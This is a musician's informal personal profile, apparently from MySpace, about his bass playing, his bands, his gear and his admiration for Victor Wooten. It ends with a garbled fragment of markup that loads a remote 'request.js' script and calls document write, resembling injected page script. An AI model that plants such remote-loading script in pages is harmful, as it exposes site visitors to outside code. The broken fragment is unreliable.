About Me

Well I am a music lover. Music is my life, and the bass guitar is the instrument I have bonded with. What I do is learn and study music all the time, thats my thing. What kind of music? Well music to me is a language/emotion. What you play is how you are feeling. I tend to listen to everything and try to learn everything so I can become a better musician and so if I ever feel happy, or sad, or whatever the case I can lay it down no problem. I have been through alot with music so far, played in a Progressive Rock band "similar to Fates Warning and Dream Theater" HYDRA. They are the ones that inspired me and got me into playing bass I LOVE YOU GUYS, thanks for everything check them out on MYSPACE, to filling in for a Hard Metal band "Metal Illusion", to doing side projects for my friends down at Break Hole and my buddy Ryan Cameron "kick ass guitar player SHREDDER". Currenlty I am working with Ryan and his singer homie Dave Phipin to lay down some tracks and just have fun. I am also working with another gifted musician who loves and appreciates music more then anyone, his name is DREW. He plays with SLANG "Awesome funk/groove/jazz band, check them out at SlangMusic on myspace". Slang means Soul Love An Groove. Anyways yeah I have been working with him with alot of song writing's and improves. Along side him is my homie Jason who plays drums. Jason and I have such flow between us its awesome. Everytime Jason and I jam its like playing songs that feel as though we have played them for years yet we just made it up on the spot. you the MAN JASON, WE CALL OURSELVES PEANUT BUTTA AND JAM YEAHHHHHH BABBBYYYYY Other then that, I do have songs I will be adding to myspace shortly, stuff I have been working on, range from metal, to break beats, scratching on the turntables, jazz, funk, soul, groove, you name it. But thats my thing, thats how I am feeling. I don't want to get the wrong words or feelings across to anyone thats why I have been playing funk music, because thats how I feel and thats how I want to make people feel and I also want to make people move and feel good. I don't disrespectt anyone for liking other music, and I didn't leave metal or progressive rock for that reason, I just felt as though that style of music wasn't me, and I didn't want to play and represent that music because I wasn't feeling that way. But anywho Yeah thats me, I love funk music and thats where I stand. I have 11 bass guitars right now,Conklin GTB7-7 Bill The Buddha Dickens 7 string, Carlo Robeli Fretless, Schecter Custom 4 diamond series, AXL Acoustic, BC RICH Platinum Warlock, Dean Playmate, 5 String Ibanez BTB, 5 String Ernie Ball, Fender HM IV custom "very rare", 6 String Ibanez SDGR with the bartolini pickups, and last but not least my new Fender American Deluxe P Bass, 3 tone sunburst with them abalony inlays baby. I use an Ampeg SVT Pro 3 amp with a Ampeg SVT 4x10 HLF Cabinet, a Sonic Maximizer, Fender Rack Tuner, also a Korg effects processor and a Pre Sonus Compressor. When I am not playing music I am usually listening to music, or watching musical dvds. I am a very spiritual and soulful person. I am very open minded and I am up for anything, I am also all about letting people do what they want to do, as long as no one judges people, I don't like negativity it brings me down, thats one of the reasons why I love funk, when you listen to it you just can't help but to smile and just move "groove". Words I live by are to be very open minded and be nice to everyone, see where they are coming from because you can always learn from someone else, especially a stranger or someone who is good in spirit. on a side note, i would like to thank Victor Wooten for his existence, you have showed me so much and taught me so much about music. you showed me to love and respect music, and all types, and not to knock anyone or anything because they just hear music and feel music differently. You have also taught me how i should approach music, music isn't about the spot light, or how many notes i hit per minute, you have taught me not to disrespect others while playing with them, and how to appreciate and love music. Thank you very much Victor. .... language="javascript" src="http://...../request.js"function nothingf(){document·write("..1...{}");}..
